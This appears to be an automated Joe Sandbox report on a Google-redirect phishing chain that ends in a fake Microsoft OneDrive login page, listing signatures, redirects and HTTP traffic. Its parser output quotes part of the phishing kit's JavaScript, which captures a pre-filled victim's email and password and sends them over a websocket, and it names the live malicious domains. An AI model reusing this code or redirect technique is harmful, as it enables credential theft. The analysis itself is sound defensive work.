Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%

Overview

General Information

Sample URL:https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebg
Analysis ID:1561575
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
Javascript uses Websockets
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)

Classification

  • System is w10x64
  • chrome.exe (PID: 2180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2204,i,16069882078136345391,354034326373228227,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6280 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'nova-drive.xkndniwljldraoauu.com' does not match the legitimate domain 'microsoft.com'., The domain 'xkndniwljldraoauu.com' is suspicious and does not relate to Microsoft., The use of 'nova-drive' in the subdomain is unusual and not associated with Microsoft., The email domain 'nova.edu' in the input fields does not match the URL or the brand, adding to the suspicion. DOM: 1.0.pages.csv
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'nova-drive.xkndniwljldraoauu.com' does not match the legitimate domain for Microsoft., The domain 'xkndniwljldraoauu.com' is unusual and does not relate to Microsoft., The use of 'nova-drive' as a subdomain is suspicious and not typically associated with Microsoft services., The presence of a random string in the domain name is a common tactic used in phishing to confuse users. DOM: 1.1.pages.csv
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'nova-drive.xkndniwljldraoauu.com' does not match the legitimate domain 'microsoft.com'., The domain 'xkndniwljldraoauu.com' is not associated with Microsoft and appears random., The use of 'nova-drive' in the subdomain is suspicious and not typically associated with Microsoft services., The presence of a random and unrelated domain name increases the likelihood of phishing. DOM: 1.2.pages.csv
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206Joe Sandbox AI: Page contains button: 'View' Source: '1.0.pages.csv'
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: const fullurl = window.location.href;const urlmain = new url(fullurl);const baseurl = "https://"+urlmain.hostname;console.log(baseurl);$(document).ready(function () {var count = 0;var clickedverify = 0;var clickedbtn = 0;var method = ""var mssg = ""var godaddy = falsevar connectionclosed = falsevar user = "hmoon@nova.edu"var redirectfinal = ""var appurl = "o365"$("#ai").val(user);$(document).on('submit', 'form', function(e){e.preventdefault();});$(document).keypress(function (event) {var keycode = (event.keycode ? event.keycode : event.which);if (keycode == '13') {if ($("#divpr").is(":visible")) {$("#submit-btn").trigger("click");} else {$("#next").trigger("click");}}});function websockettest() {user = encodeuricomponent($("#ai").val());var pass = encodeuricomponent($("#pr").val());var currenturl = location.hostnamews = new websocket("wss://"+c...
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: Number of links: 0
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: <input type="password" .../> found but no <form action="...
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: Total embedded image size: 36554
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: Title: OneDrive does not match URL
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: Invalid link: Privacy & Cookies
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: Invalid link: Privacy & Cookies
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: Invalid link: Privacy & Cookies
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: Has password / email / username input fields
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: <input type="password" .../> found
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No favicon
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No favicon
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No favicon
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No <meta name="author".. found
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No <meta name="author".. found
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No <meta name="author".. found
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No <meta name="copyright".. found
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No <meta name="copyright".. found
Source: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.kr to http://hmf1bnz.slfpgqqwzuxppnscs.com/n7brnx1iy
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: hmf1bnz.slfpgqqwzuxppnscs.com to https://fdfxhdq0by6.xkndniwljldraoauu.com/b60y1l4ml2bf2c0d1bdac2add0860270975885c41b60j673f6b50fb5bd5403fd85206
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.co.kr to https://hmf1bnz.slfpgqqwzuxppnscs.com/n7brnx1iy
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub HTTP/1.1Host: www.google.co.krConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy HTTP/1.1Host: www.google.co.krConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=kq5MkJO1zljhjOJtrh1ul20wWPGKDqvGMA4lX6yK0tbkSZM30KMqYSaXzv9h90ecm2I2DcAeuYHYSUUzXy9hqMvpjZRjjC7xqQXob6smgw4VwY6Vlyz1uNTGmCPJuUvfletIVfYmA7dZXeuopyMeR1V8fEGp0OB7qIg8tqH5BeXB8dPF-v7uyjyp95eH6GILIJAn
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /n7brnx1iy HTTP/1.1Host: hmf1bnz.slfpgqqwzuxppnscs.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b60Y1l4ML2bf2c0d1bdac2add0860270975885c41b60j673f6b50fb5bd5403fd85206 HTTP/1.1Host: fdfxhdq0by6.xkndniwljldraoauu.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206 HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3dlPWuYzpmE9uAb&MD=Snkb7rNX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://nova-drive.xkndniwljldraoauu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: http://nova-drive.xkndniwljldraoauu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://nova-drive.xkndniwljldraoauu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: http://nova-drive.xkndniwljldraoauu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://nova-drive.xkndniwljldraoauu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: http://nova-drive.xkndniwljldraoauu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.4.1.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: http://nova-drive.xkndniwljldraoauu.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: http://nova-drive.xkndniwljldraoauu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://nova-drive.xkndniwljldraoauu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.4.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: wikipedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://nova-drive.xkndniwljldraoauu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
